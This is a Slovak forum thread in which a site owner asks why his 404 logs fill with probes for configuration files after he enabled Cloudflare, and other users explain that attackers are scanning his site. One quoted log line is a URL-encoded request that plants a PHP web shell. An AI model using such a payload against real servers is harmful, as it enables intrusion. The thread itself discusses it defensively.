CloudFlare je privelmi "zvedavy"

Sekcia o programovaní, programovacích jazykoch...
Používateľov profilový obrázok
lepermessiah
Sponzor fóra gold
Sponzor fóra gold
Príspevky: 2704
Dátum registrácie: Št 30. Dec, 2010, 02:41
Bydlisko: ZV

CloudFlare je privelmi "zvedavy"

Príspevok od používateľa lepermessiah »

Caute,

nestretli ste sa s problemom, ze mate free CDN u CloudFlare a ten vam lozi po stranke a vyslovene sa snazi najst nejaky backdoor ? Sem-tam kontrolujem 404 logy na jednom webe co spravujem a odkedy je tam to CDN (stranka je uzasne rychla) sa objavuju "nenajdene" stranky, napriklad:
  • /configuration.php
    /configbak.php
    /mysql.php
    /load-config.php
    /.joomla.system.php
    /.config.php
    /wp-settings.php
    /webconfig.txt.php
    /.cpanel_config.php
    /administrator?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
..a dalo by sa pokracovat. Web nebezi na ziadnom CMS, cize sa neobavam toho, ze by raz nejaky backdoor nasli, no zaujimalo by ma, preco sa o to snazia a ci sa voci tomu da nejako branit (pri zachovani free CDN)
PS: vsetky nenajdene stranky (resp. subory) su vyhladavane 99% z IPciek CloudFlare ako 173.245.55.71 a 199.27.133.165
Spoiler: ukázať
[Home]
[NAS]
Synology DS920+ / 12GB RAM / 4x IronWolf ST6000VN001 R.6 / 2x GigaByte GSM2NE3512GNTD + 2.5G ethernet
[Laptop]
Lenovo Yoga X1 gen.2 / 20JES0AJ00 + Samsung 970 EVO 1TB
[LCD]
Dell U2913WM
[Peripherals]
Topping DX3 Pro | Wavemaster Mx-3 | Superlux HD-662F | Logitech G815 + Kensington Slimblade Pro
[Work]
[Laptop]
Lenovo Legion 5 Pro / 82JQ00C3CK | 5800H + 2x Samsung 970 EVO Plus 2TB + 64GB RAM
[LCD]
Dell U4320Q + blink(1)
[Peripherals]
Sabaj D2 | AKG K72 | Logitech G413 Silver + Kensington Slimblade
Používateľov profilový obrázok
Chris
Pokročilý používateľ
Pokročilý používateľ
Príspevky: 5174
Dátum registrácie: Pi 13. Jan, 2006, 02:00
Bydlisko: Bratislava

Re: CloudFlare je privelmi "zvedavy"

Príspevok od používateľa Chris »

ja som ho pouzival ale nijako som podla testov nevidel rozdiel tak som zrusil.

Aj kvoli tomu ze tam nefungoval spravne tapatalk s kunenou ak bolo CDN zapnute.

NGINX so spravne nastavenou cache will do the job
Master of PaloAlto NGFWs, Cisco ASAs
Používateľov profilový obrázok
lepermessiah
Sponzor fóra gold
Sponzor fóra gold
Príspevky: 2704
Dátum registrácie: Št 30. Dec, 2010, 02:41
Bydlisko: ZV

Re: CloudFlare je privelmi "zvedavy"

Príspevok od používateľa lepermessiah »

tak v tomto pripade si o NGINX mozem len snivat ;)

z testov je to zhruba o 40% rychlejsie, je to staticke, caching v htaccess snad nastaveny dobre, no je tam vela malych obrazkov - 38% obsahu a html tvori 50%, cize chapeme ze to nie je nic velke, no ten CDN tam robi zazraky, preto by som ho nechcel odstavit
Spoiler: ukázať
[Home]
[NAS]
Synology DS920+ / 12GB RAM / 4x IronWolf ST6000VN001 R.6 / 2x GigaByte GSM2NE3512GNTD + 2.5G ethernet
[Laptop]
Lenovo Yoga X1 gen.2 / 20JES0AJ00 + Samsung 970 EVO 1TB
[LCD]
Dell U2913WM
[Peripherals]
Topping DX3 Pro | Wavemaster Mx-3 | Superlux HD-662F | Logitech G815 + Kensington Slimblade Pro
[Work]
[Laptop]
Lenovo Legion 5 Pro / 82JQ00C3CK | 5800H + 2x Samsung 970 EVO Plus 2TB + 64GB RAM
[LCD]
Dell U4320Q + blink(1)
[Peripherals]
Sabaj D2 | AKG K72 | Logitech G413 Silver + Kensington Slimblade
Používateľov profilový obrázok
Chris
Pokročilý používateľ
Pokročilý používateľ
Príspevky: 5174
Dátum registrácie: Pi 13. Jan, 2006, 02:00
Bydlisko: Bratislava

Re: CloudFlare je privelmi "zvedavy"

Príspevok od používateľa Chris »

hod sem porovnanie so zapnutym a vypnutym CDN :)

napr. z

https://gtmetrix.com/
Master of PaloAlto NGFWs, Cisco ASAs
Používateľov profilový obrázok
lepermessiah
Sponzor fóra gold
Sponzor fóra gold
Príspevky: 2704
Dátum registrácie: Št 30. Dec, 2010, 02:41
Bydlisko: ZV

Re: CloudFlare je privelmi "zvedavy"

Príspevok od používateľa lepermessiah »

ved prave GTMetrix pouzivam aj ja, od toho sa odrazam, ze to funguje realne (a tiez pocitovo na pocitaci/mobile to loaduje ovela rychlejsie), nacitavanie bolo cca 1.5s a s CDN 1.1s, velkost stranky si nepamatam, nieco okolo 230kb ..
Spoiler: ukázať
[Home]
[NAS]
Synology DS920+ / 12GB RAM / 4x IronWolf ST6000VN001 R.6 / 2x GigaByte GSM2NE3512GNTD + 2.5G ethernet
[Laptop]
Lenovo Yoga X1 gen.2 / 20JES0AJ00 + Samsung 970 EVO 1TB
[LCD]
Dell U2913WM
[Peripherals]
Topping DX3 Pro | Wavemaster Mx-3 | Superlux HD-662F | Logitech G815 + Kensington Slimblade Pro
[Work]
[Laptop]
Lenovo Legion 5 Pro / 82JQ00C3CK | 5800H + 2x Samsung 970 EVO Plus 2TB + 64GB RAM
[LCD]
Dell U4320Q + blink(1)
[Peripherals]
Sabaj D2 | AKG K72 | Logitech G413 Silver + Kensington Slimblade
Používateľov profilový obrázok
shiro
Pokročilý používateľ
Pokročilý používateľ
Príspevky: 8531
Dátum registrácie: Št 21. Dec, 2006, 02:00
Bydlisko: Banska Bystrica

Re: CloudFlare je privelmi "zvedavy"

Príspevok od používateľa shiro »

Skorej by som riesil podstatu celeho tohoto cirkusu, a sice:
mate free CDN u CloudFlare a ten vam lozi po stranke a vyslovene sa snazi najst nejaky backdoor ?
...co je na tom akoze zle a preco to vobec dakomu vadi?
Obzvlast ked vieme co za ludi bezne weby programuje a kolko dier tam byva? Mali by ste byt este vdacni ze dakto to robi zadara aspon nejako...
Ryzen 7 3700X | SilentiumPC Fera 3 | Asrock X570M Pro4 | Patriot Viper 4 Blackout 16GB DDR4-3600 CL17 | Gainward RTX4060 Ti Pegasus 8GB | Samsung 970evo Plus 250GB NVMe | Corsair MP510 1TB NVMe | Samsung 980 Pro 2TB NVMe | Corsair RM550x | 24" BenQ GW2470H | 3x Noctua NF-S12B redux 1200 PWM
Xiaomi Mi 9 Lite 64GB
faugusztin
Moderátor
Moderátor
Príspevky: 15047
Dátum registrácie: Ut 26. Feb, 2008, 14:00
Bydlisko: Bratislava/Štúrovo

Re: CloudFlare je privelmi "zvedavy"

Príspevok od používateľa faugusztin »

S Cloudflare to ma spolocne akurat to, ze si sa stal "zaujimavym cielom" v momente ked si presiel pod Cloudflare. Samo o sebe tie query oni nerobia. A kedze cloudflare cachuje tvoje stranky, tak VZDY budes mat IP v logoch z adries CF.
Používateľov profilový obrázok
lepermessiah
Sponzor fóra gold
Sponzor fóra gold
Príspevky: 2704
Dátum registrácie: Št 30. Dec, 2010, 02:41
Bydlisko: ZV

Re: CloudFlare je privelmi "zvedavy"

Príspevok od používateľa lepermessiah »

aha, takto som sa na to nepozeral :D diki faugusztin

@shiro no vadi to mne, lebo za tyzden to spravi 12MB log a hosting ma len 50MB :D a vypnut by som to nerad, kedze to obcas aj pomoze s identifikovanim problemu ako stratene obrazky a tak ..
Spoiler: ukázať
[Home]
[NAS]
Synology DS920+ / 12GB RAM / 4x IronWolf ST6000VN001 R.6 / 2x GigaByte GSM2NE3512GNTD + 2.5G ethernet
[Laptop]
Lenovo Yoga X1 gen.2 / 20JES0AJ00 + Samsung 970 EVO 1TB
[LCD]
Dell U2913WM
[Peripherals]
Topping DX3 Pro | Wavemaster Mx-3 | Superlux HD-662F | Logitech G815 + Kensington Slimblade Pro
[Work]
[Laptop]
Lenovo Legion 5 Pro / 82JQ00C3CK | 5800H + 2x Samsung 970 EVO Plus 2TB + 64GB RAM
[LCD]
Dell U4320Q + blink(1)
[Peripherals]
Sabaj D2 | AKG K72 | Logitech G413 Silver + Kensington Slimblade

Návrat na "Programovanie"